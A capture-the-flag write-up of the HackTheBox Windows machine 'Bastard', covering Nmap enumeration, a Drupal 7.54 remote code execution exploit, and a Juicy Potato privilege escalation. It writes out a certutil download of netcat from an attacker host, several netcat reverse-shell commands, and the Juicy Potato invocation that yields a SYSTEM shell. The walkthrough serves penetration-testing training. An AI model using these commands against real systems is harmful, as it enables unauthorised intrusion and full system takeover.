Summary

Bastard is a medium Windows box. It can be exploited by enumerating the webserver and identifying that Drupal is running. The respective Drupal service is vulnerable to an RCE exploit that can be used to gain initial access. The privilege escalation is based on abusing the SeImpersonatePrivilege and obtaining a root shell.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 80 is of interest which is running Microsoft IIS 7.5. Based on this, you can identify the underlaying operating system, see this page. It shows that in Microsoft IIS 7.5 corresponds to Windows Server 2008 R2. This can be of interest later on.
The homepage looks like this:

It is running Drupal 7.54 which can be seen in the changelog.txt:

This specific version is vulnerable to this RCE exploit script. You can run this as follows:

ruby 44449.rb http://10.129.116.182/

This will provide you with a low-level shell as shown below:

Now you can get the user.txt.


Privilege Escalation

It is recommended to copy over netcat and obtain a proper netcat shell. This can be done with certutil.exe:

certutil.exe -urlcache -split -f http://10.10.14.147/nc64.exe

To start a reverse shell:
nc64.exe -e cmd.exe 10.10.14.147 4444

Now you will have a more stable shell. Let’s check the privileges of our user:

C:\Users>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects                     Enabled

It shows that the SeImpersonatePrivilege is enabled. This can be exploited with Juicy Potato.
First lets create a bat script to execute netcat and hopefully get a reverse shell back to our host.

echo C:\inetpub\drupal-7.54\nc64.exe 10.10.14.147 443 -e cmd.exe > reverse.bat

I have found that this is more stable then generating reverse shells with msfvenom. Next, Juicy Potato requires a CSLID. You can check these here. The final command will look like this:

juicypotato.exe -l 1337 -p C:\inetpub\drupal-7.54\reverse.bat -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

This will provide you with a system shell:

listening on [any] 443 ...
connect to [10.10.14.147] from (UNKNOWN) [10.129.116.182] 52221
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Conclusion

This box was very easy. As I mentioned with another box as well, the older HTB machines are a lot easier than the current ones. Hope you enjoyed this writeup nonetheless and learned some new things!